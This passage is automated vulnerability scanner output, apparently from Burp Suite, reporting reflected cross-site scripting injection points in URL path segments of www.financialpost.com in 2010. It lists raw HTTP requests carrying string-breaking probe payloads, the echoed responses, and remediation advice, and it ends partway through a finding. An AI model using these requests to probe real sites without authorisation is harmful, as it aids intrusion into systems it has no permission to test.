GET /scripts/c19b1'%3ba1b3409a31b HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43156
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96971'%3bec011e91bf5 was submitted in the REST URL parameter 1. This input was echoed as 96971';ec011e91bf5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap96971'%3bec011e91bf5/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:16:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36302
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46038'%3bae96b99ff54 was submitted in the REST URL parameter 1. This input was echoed as 46038';ae96b99ff54 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business46038'%3bae96b99ff54/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 84802 Expires: Sun, 19 Dec 2010 03:08:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business46038';ae96b99ff54/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business46038';ae96b99ff54;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c912'%3bd5511528c72 was submitted in the REST URL parameter 2. This input was echoed as 6c912';d5511528c72 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities6c912'%3bd5511528c72/joint-venture/Closing+between+research+experience/2102841/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 77948 Expires: Sun, 19 Dec 2010 03:08:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities6c912';d5511528c72/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities6c912';d5511528c72;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72070'%3bcec5620d8c8 was submitted in the REST URL parameter 3. This input was echoed as 72070';cec5620d8c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture72070'%3bcec5620d8c8/Closing+between+research+experience/2102841/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 77912 Expires: Sun, 19 Dec 2010 03:09:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture72070';cec5620d8c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture72070';cec5620d8c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=1038324 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56cc3'%3b99117c719dc was submitted in the REST URL parameter 5. This input was echoed as 56cc3';99117c719dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Closing+between+research+experience/210284156cc3'%3b99117c719dc/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71299 Expires: Sun, 19 Dec 2010 03:09:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture/closing-between-research-experience/210284156cc3';99117c719dc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture;kw=closing-between-research-experience;kw=210284156cc3';99117c719dc;kw=npo;kw=fpo;tile='+da ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65b99'%3bbbd8176cea9 was submitted in the REST URL parameter 6. This input was echoed as 65b99';bbd8176cea9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/65b99'%3bbbd8176cea9 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44894
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ef15'%3bce2d27e0d39 was submitted in the REST URL parameter 1. This input was echoed as 9ef15';ce2d27e0d39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business9ef15'%3bce2d27e0d39/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 84026 Expires: Sun, 19 Dec 2010 03:08:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business9ef15';ce2d27e0d39/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business9ef15';ce2d27e0d39;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d1a4'%3bfac81be792e was submitted in the REST URL parameter 2. This input was echoed as 4d1a4';fac81be792e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities4d1a4'%3bfac81be792e/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 77173 Expires: Sun, 19 Dec 2010 03:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities4d1a4';fac81be792e/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities4d1a4';fac81be792e;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c901d'%3bd0c504950d5 was submitted in the REST URL parameter 3. This input was echoed as c901d';d0c504950d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venturec901d'%3bd0c504950d5/Partnerships+bright+spot+Britec/2055099/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83954 Expires: Sun, 19 Dec 2010 03:09:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venturec901d';d0c504950d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venturec901d';d0c504950d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=2589576 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cf7'%3b3f1d5d5c2b was submitted in the REST URL parameter 5. This input was echoed as a0cf7';3f1d5d5c2b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099a0cf7'%3b3f1d5d5c2b/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64307 Expires: Sun, 19 Dec 2010 03:09:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture/partnerships-bright-spot-britec/2055099a0cf7';3f1d5d5c2b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture;kw=partnerships-bright-spot-britec;kw=2055099a0cf7';3f1d5d5c2b;kw=npo;kw=fpo;tile='+dartad_ ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85e05'%3b4b9648ce5b0 was submitted in the REST URL parameter 6. This input was echoed as 85e05';4b9648ce5b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/85e05'%3b4b9648ce5b0 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44818
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c028'%3b6a3c0b19ed8 was submitted in the REST URL parameter 1. This input was echoed as 6c028';6a3c0b19ed8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business6c028'%3b6a3c0b19ed8/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83960 Expires: Sun, 19 Dec 2010 03:08:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business6c028';6a3c0b19ed8/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business6c028';6a3c0b19ed8;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e96'%3b61ea5a99c02 was submitted in the REST URL parameter 2. This input was echoed as 33e96';61ea5a99c02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities33e96'%3b61ea5a99c02/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83924 Expires: Sun, 19 Dec 2010 03:08:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities33e96';61ea5a99c02/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities33e96';61ea5a99c02;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c6e'%3b7f37c9605a was submitted in the REST URL parameter 3. This input was echoed as 71c6e';7f37c9605a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture71c6e'%3b7f37c9605a/Technology+gives+outdoor+adventure+company+edge/2132724/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83845 Expires: Sun, 19 Dec 2010 03:08:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture71c6e';7f37c9605a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture71c6e';7f37c9605a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74996098 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faf95'%3bc230f167291 was submitted in the REST URL parameter 5. This input was echoed as faf95';c230f167291 in the application's response.
